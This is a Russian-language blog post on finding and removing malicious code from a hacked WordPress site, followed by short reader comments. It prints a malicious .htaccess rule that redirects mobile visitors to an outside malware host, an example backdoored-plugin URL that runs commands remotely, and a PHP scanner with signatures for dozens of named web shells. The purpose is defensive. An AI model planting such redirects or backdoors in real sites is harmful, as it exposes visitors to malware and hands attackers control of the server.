Не так давно я обнаружил, что поисковой выдаче блог стал выходить с пометкой «Сайт может угрожать безопасности компьютера». Такая надпись выходит если на Вашем сайте был установлен вредоносный код. Сегодня мы попробует разобраться в причинах и следствиях данного явления.
Безопасностью сайта начинают интересоваться после того как сайт взломали и большинство впадают в панику и уныние. Очень неприятно когда труды всей Вашей жизни всего за несколько минут могут уйти в небытие. Но не все так плохо как кажется, особенно если Вы делаете ежедневные архивы.
Сразу после обнаружения надписи «сайт может угрожать безопасности вашего компьютера» следует найти вредоносный код и срочно отправить сайт в Яндекс на перепроверку, так что бы надпись рядом с сайтом как можно быстрее исчезла. Если Вы сделали все правильно, то Ваш сайт уйдет из списка опасных через пару дней.
Кто и зачем размещает вредоносный код
Итак, давайте перечислим что можно поиметь с Вашего блога тем кто его хочет или уже взломал:
- Трафик, который можно перенаправлять на любый белые и черные партнерские программы
- Мобильный трафик, который можно перенаправлять на партнерские программы
- Размещение автоматических ссылок, которые показываются лишь поисковым роботам, то есть слив веса сайта
- Размещение дорвеев в папках Вашего сайта, то есть тысячи страниц поискового спама, за что Ваш сайт могу в будущем серьезно пессимизировать или вообще выкинуть из выдачи
- Размещение фреймов в коде ява скриптов, флеша или просто в шаблонах. Через эти фреймы могут загружать вирусы каждому посетителю Вашего сайта.
- И многие другие нехорошие вещи, позволяющие злоумышленнику от Вашего имени зарабатывать на посетителях
Как Вы понимаете, для сайта все это очень плохо кончится, но давайте разберемся как это могло произойти?
Как хакеры могу взломать Ваш сайт. Откуда ноги растут?
Существует несколько вариантов взлома сайта. Многое зависит от того, где расположен ресурс. Например, это может быть шаред хостинг, то есть на одном IP адресе хостинга рядом с вашим сайтом лежат еще сайты других пользователей. Так же это может быть выделенный сервер, когда кроме ваших сайтов на данной виртуальной или выделенной машине никаких сайтов больше нет.
Взлом серверов хостера.
Первый и наверное самый неприятный вариант — это когда взламывают сервер хостера, то есть все сайты размещенные на данном сервере, а не только Ваши становятся уязвимыми. Представьте если взламываются сразу несколько десятков серверов. Работы для администраторов хостингов здесь будет очень много.
Как правило, заражение сайтов на серверах происходит в автоматическом режиме. Очень часто в файлах .htaccess, которые находятся в корневых директориях сайтов появляются дополнительные директивы, например, мобильный редирект или рекдирект на фишинговую страницу или другой вредоносный код. для понимания, скажу, что мобильный редирект при обычном просмотре сайта довольно сложно обнаружить потому как он действует на мобильные устройства, поэтому и срабатывает редирект, только если на Ваш сайт зашли с мобильных устройств. После этого посетителя перекидывает на фейковую страницу, где предлагают выполнить различные действия, начиная от отправки смс и заканчивая жесткой блокировкой телефона.
Хотя такое и не часто бывает, но защититься от этого для обычного пользователя шаред хостинга невозможно, поэтому сразу выбирайте надежный хостинг, например friendhosting За много лет использования хостингов от различных компании, наверное это самый лучший и это касается не только технической стороны дела но и шикарнейшей поддержки даже самого недорого тарифа. Рекомендую! (Кстати, как раз после того как на блоге разместили вредоносный код переехал на сюда и проблем с тех пор не знаю, тьфу тьфу тьфу)
Взлом VPS/VDS.
Если Вы приобрели виртуальный выделенный сервер, то ответственность по его настройке и защите полностью лежит на Вас, поэтому его точно так же могут взломать, однако в этом случае злоумышленник получит доступ только к Вашим сайтам и администраторы хостера не будут особо нервничать по этому поводу. Для устранения уязвимости серверной ОС Вам придется привлечь специалистов и лишь после этого приступать к поиску оставленных вредоносных кодов.
Этот случай тоже не из самых приятных потому как злоумышленник получивший root доступ к VDS скорее всего будет стирать логи, так чтобы Вы не могли найти уязвимость.
Взлом WordPress через уязвимость php скриптов.
Другой способ взломать Ваш сайт и заразить вредоносным кодом — это найти уязвимость в пхп скриптах, модулях, плагинах, темах. Наверное, это самый распространенный способ. Что происходит с Вашим сайтом:
- Через уязвимость считываются пароли от базы данных
- Пароли расшифровываются, злоумышленник получает доступ к админке
- Злоумышленник загружает web shell на Ваш сайт и может управлять всеми файлами которые у Вас есть на хостинге
Если У Вас несколько сайтов, то скорее всего злоумышленник разместит web shell на каждом из них в разных директориях.
Что делать когда Ваш сайт уже заражен.
Итак, очевидно, что для начала следует удалить вредоносный код, если Вы его нашли. Код в файле htaccess может выглядеть следующим образом:
|
1 2 3 4 |
RewriteEngine on RewriteCond %{HTTP_USER_AGENT} (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk|bada|windows\ phone) [NC] RewriteCond %{HTTP_USER_AGENT} !(accoona|ia_archiver|antabot|ask\ jeeves|baidu|dcpbot|eltaindexer|feedfetcher|gamespy|gigabot|googlebot|gsa-crawler|grub-client|gulper|slurp|mihalism|msnbot|worldindexer|ooyyo|pagebull|scooter|w3c_validator|jigsaw|webalta|yahoofeedseeker|yahoo!\ slurp|mmcrawler|yandexbot|yandeximages|yandexvideo|yandexmedia|yandexblogs|yandexaddurl|yandexfavicons|yandexdirect|yandexmetrika|yandexcatalog|yandexnews|yandeximageresizer) [NC] RewriteRule (.*) http://google-play-android.net/u/1316 [L,R=302] |
Это директивы мобильного редиректа, после того как человек зашел на Ваш сайт с мобильного устройства его автоматически перекинет на вот такую страницу, где его уже поджидает псевдо приложение — черный мидлет.
Не будет лишним скачать Ваш сайт целиком на локальный диск и исследовать его последним антивирусом, но как правило антивирусы могут найти лишь не зашифрованные Веб шелы… Веб шел представляет собой обычный php файл который можно положить в одну из директории сайта (с возможностью запуска php скрипта из этой директории). По своей сути это обычный файловый менеджер только через интернет и позволяющий управлять файлами вашего сайта. Некоторые вебмастера пользуются веб шелом и на своих сайтах просто потому, что это самый быстрый способ внести небольшие изменения в какие-либо файлы сайта.
Несколько практических советов.
1. Если у Вас VDS или VPS разнесите сайты по разным пользователям. так чтобы у каждого пользователя — владельца Вашего сайта были права только на один сайт. Таким образом если злоумышленник взломает один из Ваших сайтов, то он не сможет получить доступ к остальным сайтам.
2. Установите на все папки сайта права 755 рекурсивно
3. Установите на все файлы сайта права 644
4. Обязательно закрыть доступ в административную часть сайта (то есть там где вы входите под администратором) с помощью директив веб сервера через файл .htaccess
Например, для блога на WordPress можно в папку wp-admin положить файл .htaccess следующего содержания:
|
1 2 3 4 5 |
AuthName "Admins Only" AuthUserFile /var/www/.htpasswds AuthGroupFile /dev/null AuthType basic require user administrator |
В этом файле указано что при обращении к директории wp-admin у пользователя запросит имя и пароль. Имя указанное в данном случае: administrator а пароль в зашифрованном виде хранится в файле .htpasswds (если положить файл .htpasswd в эту же директорию то путь будет /.htpasswd) В файле хранится хэш пароля , которые в принципе можно расшифровать поэтому следует либо сделать пароль очень сложным или положить файл в недоступное место как в примере( такое возможно только если у Вас VPS, VDS)
Сформировать файл .htpasswd можно на многочисленных сервисах в интернете(вот например: www[dot]htaccesstools[dot]com/htpasswd-generator/) или с помощью имеющейся в комплекте с веб сервером программы htpasswd.
Содержимое файла htpasswd будет выглядеть следующим образом:
|
1 |
administrator:$apr1$DB/cFhy6$Y9bmqe0GKBGQ0DZ43jaXe0 |
5. Удалите все неиспользуемые плагины и модули. Некоторые хакеры специально создают целые сайты с коллекциями плагинов или выкладывают их на файлообменниках, треккерах, причем в них уже вшиты уязвимости. Когда Вы устанавливаете подобный плагин или модуль, то тем самым создаете уязвимость в Вашем сайте. В алгинах может быть вшит веб шелл, ява фрейм или другой простой GET запрос позволяющий выполнять различные команды извне через обычную адресную строку браузера, например вот такую:
|
1 |
http://Вашсайтю.ru/plugins/highslide/index.php?commandline="Команда для выполнения пхп"; |
Таким образом, на стороне Вашего сайта выполнится любая команда через уязвимый плагин, поэтому скачивать и устанавливать плагины можно только с сайта разработчика CMS, но даже в этом случае плагины могут иметь заведомо известные уязвимости. Обязательно смотрите, скачивал ли кто либо этот плагин. Как правило, уязвимый плагин быстро обнаруживается.
6. Удалите все неиспользуемые шаблоны и постарайтесь вспомнить откуда Вы взяли текущий шаблон сайта. Ситуация с шаблонами обстоит еще хуже чем с плагинами. Злоумышленник размещает на треккерах премиумные шаблоны совершенно бысплатно, зашив предварительно туда скрипт показа ссылок или возможность удаленно выполнять команды или даже самоудаляющийся код, который после выполнения и заливки веб шела просто удаляет себя. Глупый вебмастер скачивает премиум шаблон бесплатно и радуется и даже благодарит человека которые выложил такие шаблоны…
Обнаружить такой вредоносный код в шаблонах иногда очень сложно, так как премиумные шаблоны могут состоять из тысяч различных php и js файлов.
Удаление вредоносного кода, поиск уязвимости.
Удалить вредоносный код — это лишь малая часть дела и будьте уверены, что если на вашем сайте есть уязвимость то веб шел, а вместе с ним и вредоносный код вновь появится. Еще более худший вариант — это когда вредоносный код вшивают в базу данных. Например, в запись новости или текст главной страницы. Искать его придется не только в файлах но и в базе данных.
Ищем уязвимости в php файлах
Для поиска веб шелом и возможных уязвимостей воспользуйтесь следующим скриптом. Данный код проверяет все php файлы на наличие в них веб шелов или команд «eval» или «base64» (так же можно проверить на наличие команды «fput»). Файл php с указанным содержимым следует положить в корень сайта и вызвать из адресной строки как http://ВашСайт/скрипт.php
В результате будет выдан список файлов в коде которых может оказаться бэк дор, то есть лазейка для заливки веб шела или удаленного выполнения команд.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 |
<!--?php set_time_limit(0); $shells = array('Ajax_PHP Command Shell' =--> 'runcommand\(\'shellhelp\',\'GET\'\)', 'Antichat Shell v1.3' => 'version ([0-9\.]+) by Grinay', 'Ayyildiz Tim -AYT- Shell v' => 'Shell v ([0-9\.]+) Biz B', 'aZRaiLPhp' => 'Silinemedi:\$deldir', 'backdor1' => 'Coded By Charlichaplin', 'backdorfr' => 'Ce script permet d\'exploiter', 'c100.php' => 'Written by Captain Crunch Team', 'c2007.php', 'C99 Modified By Psych0', 'c99 mod Captain Crunch' => '\$c99sh_updatefurl', 'c99 original' => 'Admin@SpyGrup\.Org \[Kruis\]', 'Casus15.php' => 'CasuS ([0-9\.]+) by MafiABoY', 'Crystal' => ' Coded by : Super-Crystal and Mohajer22', 'ctt_sh.php' => '\[CT\] TEAM SCRIPTING - RODNOC', 'Cyber Shell' => 'Cyber Shell', 'dC3 Security Crew Shell PRiV' => 'Shell written by Bl0od3r', 'Dive Shell 1.0 - Emperor Hacking Team' => 'Dive Shell - Emperor Hacking Team', 'DTool Pro' => 'Comandos Exclusivos do DTool Pro', 'DxShell' => 'DxShell', 'Fatalshell' => 'Lutfen Dosyayi Adlandiriniz', 'fuckphpshell' => '', 'fuckphpshell' => 'this is a priv3 server', 'GFS web-shell' => 'GFS Web-Shell', 'h4ntu shell [powered by tsoi]' => 'h4ntu shell \[powered by tsoi\]', 'img.php' => 'nsT View \$ver', 'iMHaPFtp.php' => 'iMHaBiRLiGi Php Ftp Editoru', 'ironshell' => 'You can put a md5 string here too, for plaintext passwords', 'KAdot Universal Shell' => 'KA_uShell ([0-9\.]+)', 'lamashell' => 'lama\'s\'hell', 'Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit' => 'Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit', 'load_shell' => 'Loader\'z WEB Shell', 'mailer3.php' => 'Moroccan Spamers Ma-EditioN By GhOsT', 'matamu' => 'Matamu Mat', 'Moroccan Spamers Ma-EditioN By GhOsT' => 'Open the file attachment if any, and base64_encode', 'myshell' => '\$MyShellVersion', 'Mysql interface' => 'Mysql interface v([0-9\.]+)', 'MySQL Web Interface Version' => 'MySQL Web Interface Version', 'NCC-Shell' => 'Hacked by Silver', 'NetworkFileManagerPHP' => 'NetworkFileManagerPHP for channel', 'NIX REMOTE WEB-SHELL' => 'NIX REMOTE WEB-SHELL', 'nshell.php' => 'nShell v([0-9\.]+)', 'nstview.php' => 'nsTView \$ver', 'PHANTASMA' => 'PHANTASMA- NeW CmD', 'PHP Shell.php' => 'PHPSHELL.PHP BY MACKER', 'php-backdoor' => 'a simple php backdoor', 'php-include-w-shell' => 'LOTFREE PHP Backdoor', 'phpbackdoor15' => 'return \"Hopefully dumped!\"', 'pHpINJ' => 'News Remote PHP Shell Injection', 'phpjackal' => 'PHPJackal', 'PHPRemoteView' => 'phpRemoteView', 'phpshell17' => 'PHP Shell is aninteractive PHP-page', 'phvayv.php' => 'PHVayv', 'Private-i3lue' => 'webadmin\.php - a simple Web-based file manager', 'Ru24PostWebShell' => 'Ru24PostWebShell', 'r57 Shell.php v 1.22 or 33' => '\(c\)oded by 1dt\.w0lf', 'r577.php' => 'admin@spygrup\.org\[Kruis\]', 'rootshell.php' => 'www.SR-Crew.org', 'Russian.php' => 'KAdot Universal Shell', 's72 Shell' => 'Cr@zy_King', 'Safe0ver Shell -Safe Mod Bypass By Evilc0der' => 'Safe_Mode Bypass PHP', 'SimAttacker - Vrsion' => 'Simple PHP backdoor by DK', 'simple-backdoor' => 'G-Security Webshell', 'simple_cmd' => 'Simorgh Security Magazine', 'SimShell 1.0' => 'Sincap 1.0', 'SnIpEr_SA Shell' => '\(c\)oded by SnIpEr_SA', 'spy.php' => '\$version = \"SpyGrup\.Org SpeciaL\"', 'w3d.php' => 'W3D Shell', 'w4k.php' => 'chdir\(\$lastdir\); c99shexit\(\);', 'webshell.txt' => 'This PHP Web Shell was developed by Digital Outcast', 'WinX Shell' => '-:\[GreenwooD\]:- WinX Shell', 'Worse Linux Shell' => 'Watch Your system Shany was here', 'xinfo.php' => 'NetworkFileManagerPHP for channel','base64' => 'base64' ,'eval' => 'eval', 'zacosmall' =>'Small PHP Web Shell by ZaCo', 'wso shell' => '\$auth_pass = \"([0-9a-f]{32})\";|\$default_action = \'FilesMan\';'); $allowed_ext = array('php', 'phtml', 'php5', 'php4'); $ite = new RecursiveDirectoryIterator("./"); foreach (new RecursiveIteratorIterator($ite) as $filename => $cur) { if (in_array(substr(strrchr($filename, '.'), 1), $allowed_ext) and basename($filename) != basename(__file__)) { $content = file_get_contents($filename); //echo $filename." "; foreach ($shells as $name => $detect) { if (preg_match('#' . $detect . '#', $content, $match)) { echo $filename . ' detected shell: ' . $name . ' '; } } } } ?> |
Кроме этого можно попробовать разобрать логи веб сервера, на наличие SQL инъекции, которые как правило включают в себя команду SELECT в адресной строке. То есть запрос к вашему сайту будет содержать какую либо команду SQL сервера. Достаточно поиском пройтись по логам сервера и возможно Вы обнаружите атаку или даже следы взлома через определенный файл и даже IP адрес хакера(если он решил Вас сломать со своего домашнего компьютера). Очень важно, чтобы доступа к файлам логов у злоумышленника не было иначе логи будут подчищены.
Еще можно проанализировать даты изменения директорий и файлов, но как правило эта информация подменяется злоумышленниками, чтобы замести следы.
Ищем вредоносный код в MySQL базе
Первым делом следует сделать дамп базы данных и прогнать ее поиском на предмет наличия в ней исполняемого кода php или js, например попробуйте поискать «eval», «base64», «fput», «<script» и другие признаки исполняемого кода php или javascript. После нахождения подобных вхождении следует их проанализировать, найти записи в базе данных и если это вредоносный код то удалить его.
Конечно, это не все меры, которые можно предпринять для усиления безопасности сайта, поэтому если Вам есть что добавить, то пожалуйста пишите в комментариях, таким образом Вы поможете и другим пострадавшим от взлома. Так же в комментариях вы можете задать вопросы или попросить помощи. Совместными усилиями мы постараемся решить Вашу проблему.
WP. Наверное, на сайте стоит генератор ссылок, поисковикам выдает 700 спам ссылок. Загрузил на сайт ваш скрипт, он выдал 48 ссылок на «evel» и «Base 64», что с ними делать?
WP. Наверное, на сайте стоит генератор ссылок, поисковикам выдает 700 спам ссылок. Загрузил на сайт ваш скрипт, он выдал 48 ссылок на «evel» и «Base 64», что с ними делать?
забыл, где искать WP файл php.ini
Изучать лишнее удалять
Лучше переустновить блог, выгрузить данные, потом загрузить данные в чистую установку, потом закрыть админку через htaccess